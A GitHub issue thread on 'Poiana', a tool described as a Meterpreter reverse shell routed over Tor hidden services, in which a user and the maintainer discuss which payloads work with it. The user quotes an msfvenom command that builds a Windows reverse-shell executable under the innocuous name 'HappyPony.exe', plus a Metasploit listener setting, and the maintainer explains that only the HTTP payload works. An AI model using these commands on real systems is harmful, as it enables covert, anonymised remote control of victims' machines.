CalfCrusher / Poiana

Meterpreter Reverse shell over TOR network using hidden services
MIT License
89 stars 16 forks source link

Just a quick question #3

Open ejawhary opened 2 years ago

ejawhary commented 2 years ago

Hi,

Awesome repo. What other payloads can be used with this.

I tried it out in my lab, it works with the python payload however I tried changing the listener as well as the msvenom payload to a windows stageless payload and it doesn't seem to work.

f.write("set PAYLOAD windows/meterpreter_reverse_tcp\n")

payload = "msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=80 -f exe > HappyPony.exe"

CalfCrusher commented 2 years ago

Only payload that works is http, when i developed this tool i tried many payloads, but you need to remember that connection is made through this protocol to .ws so using a tcp payload or nc will not work